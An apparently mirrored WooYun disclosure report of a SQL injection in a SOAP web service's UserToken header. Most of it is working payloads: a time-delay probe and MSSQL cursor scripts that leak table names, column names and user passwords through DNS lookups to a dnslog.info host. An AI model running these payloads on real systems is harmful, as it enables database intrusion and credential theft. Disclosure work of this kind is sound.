乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-30: 细节已通知厂商并且等待厂商处理中 2015-11-03: 厂商已经确认,细节仅向厂商公开 2015-11-13: 细节向核心白帽子及相关领域专家公开 2015-11-23: 细节向普通白帽子公开 2015-12-03: 细节向实习白帽子公开 2015-12-18: 细节向公众公开
用sqlmap盲注也跑不出来
注入点:
POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1Host: **.**.**.**Content-Type: text/xml; charset=utf-8Content-Length: 586SOAPAction: "http://**.**.**.**/GetC_InfoSharedModules"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema" xmlns:soap="http://**.**.**.**/soap/envelope/"> <soap:Header> <AuthHeader xmlns="http://**.**.**.**/"> <UserToken>aa' and 1=2;; declare @s varchar(800) set @s=cast(0x77616974666f722064656c61792027303a303a313027 asvarchar(800)) exec (@s);select 3 --'</UserToken> </AuthHeader> </soap:Header> <soap:Body> <GetC_InfoSharedModules xmlns="http://**.**.**.**/" /> </soap:Body></soap:Envelope>
payload:
aa' and 1=2;; declare @s varchar(800) set @s=cast(0x77616974666f722064656c61792027303a303a313027 asvarchar(800)) exec (@s);select 3 --'
先执行下create database temp_cloud;库名,利用db_name(0)函数
declare @@yukari varchar(800);set @@yukari = db_name(0);exec('backup log [temp_cloud] to disk=''\\'+@@yukari+'.xxxxx.dnslog.info\a'';');--
用户名,利用user_name()函数获得当前库中的表表名利用:INFORMATION_SCHEMA.tables利用游标可以执行一条sql语句,获得多条数据
DECLARE @T VARCHAR(8000),@TS VARCHAR(8000)set @TS = ''DECLARE Table_Cursor CURSOR FOR select TABLE_NAME from INFORMATION_SCHEMA.tables where table_type='BASE TABLE'OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @TWHILE(@@FETCH_STATUS=0) BEGIN set @TS = @TS +'1' + @T if len(@TS) > 50 begin print @TS EXEC('backup database [temp_cloud] to disk=''\\'+@TS+'.xxx.dnslog.info\a'';'); set @TS = '' end FETCH NEXT FROM Table_Cursor INTO @T ENDCLOSE Table_Cursor DEALLOCATE Table_Cursor;print @TSEXEC('backup database [temp_cloud] to disk=''\\'+@TS+'.xxx.dnslog.info\a'';');
现在来获得user表中的列名。
DECLARE @C VARCHAR(8000),@CS VARCHAR(8000)set @CS = ''DECLARE Table_Cursor CURSOR FOR select COLUMN_NAME from INFORMATION_SCHEMA.columns where table_name='users'OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @CWHILE(@@FETCH_STATUS=0) BEGIN set @CS = @CS +'2' + @C if len(@CS) > 50 begin EXEC('backup database [temp_cloud] to disk=''\\'+@CS+'.xxx.dnslog.info\a'';'); set @CS = '' end FETCH NEXT FROM Table_Cursor INTO @C ENDCLOSE Table_Cursor DEALLOCATE Table_Cursor;EXEC('backup database [temp_cloud] to disk=''\\'+@CS+'.xxxx.dnslog.info\a'';');
获得user表中的数据
DECLARE @N VARCHAR(8000),@P VARCHAR(8000),@T VARCHAR(8000)set @T = ''DECLARE Table_Cursor CURSOR FOR select Username,UpdatePassword from [Users]OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @N,@PWHILE(@@FETCH_STATUS=0) BEGIN set @T = @T +'4' + @N+'1' + @P if len(@T) > 50 begin EXEC('backup database [temp_cloud] to disk=''\\'+@T+'.xxx.dnslog.info\a'';'); set @T = '' end FETCH NEXT FROM Table_Cursor INTO @N,@P ENDCLOSE Table_Cursor DEALLOCATE Table_Cursor;EXEC('backup database [temp_cloud] to disk=''\\'+@T+'.xxxx.dnslog.info\a'';');
users表中username字段
使用参数化查询
危害等级:高
漏洞Rank:10
确认时间:2015-11-03 15:03
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无